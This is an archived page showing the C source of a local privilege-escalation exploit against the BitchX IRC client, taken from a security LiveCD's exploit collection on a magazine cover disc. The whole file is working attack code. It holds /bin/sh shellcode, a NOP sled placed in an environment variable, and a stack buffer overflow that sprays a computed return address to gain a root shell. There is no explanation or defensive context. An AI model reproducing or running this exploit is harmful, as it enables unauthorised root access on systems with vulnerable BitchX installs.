Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / irc / bitchx / bitchx1.0e19.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 2KB | 70 lines

// BitchX local-root by Sha0 (version 1.0c19 e inferiores -todas-) // este exploit se lo dedico a mi chica. // 0xC0000000-4-strlen(argv[1])-1-strlen(buffer) // 2052 to the ret #include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> char payload[69]; char sha0code[] = "\xeb\x16\x5b\x31\xc0" "\x50\x53\xb0\x0b\x89" "\xdb\x89\xe1\x31\xd2" "\xcd\x80\x31\xc0\x40" "\x31\xdb\xcd\x80\xe8" "\xe5\xff\xff\xff\x2f" "\x62\x69\x6e\x2f\x73\x68"; void nopea (void); int main (int argc, char **argv) { char *buff; char *arg1="bash"; char *arg2="-c"; char *arg[]={arg1,arg2,buff,NULL}; char *env[]={"TERM=xterm",payload,NULL}; char offset[]=""; char sret[4]; unsigned long lret; int i; if (argc != 2) { fprintf (stdout,"BitchX exploit Coded By Sha0\n"); fprintf (stdout,"ej: %s /usr/bin/BitchX\n\n",argv[0]); return (1); } buff = (char *)malloc (2100); bzero (buff,sizeof(buff)); arg[2] = buff; nopea (); lret = 0xbffffffa - strlen(payload) - strlen(argv[1]); sret[0] = (0x000000ff & lret); sret[1] = (0x0000ff00 & lret) >> 8; sret[2] = (0x00ff0000 & lret) >> 16; sret[3] = (0xff000000 & lret) >> 24; for (i=0;i<2088;i+=4) // 2088 tirando largo. memcpy (buff+i,sret,4); execve (argv[1],arg,env); perror ("execve()"); free (buff); return (0); } void nopea (void) { bzero (payload,sizeof(payload)); memset (payload,0x90,sizeof(payload)-1); memcpy (payload+sizeof(payload)-strlen(sha0code)-1,sha0code,strlen(sha0code)); }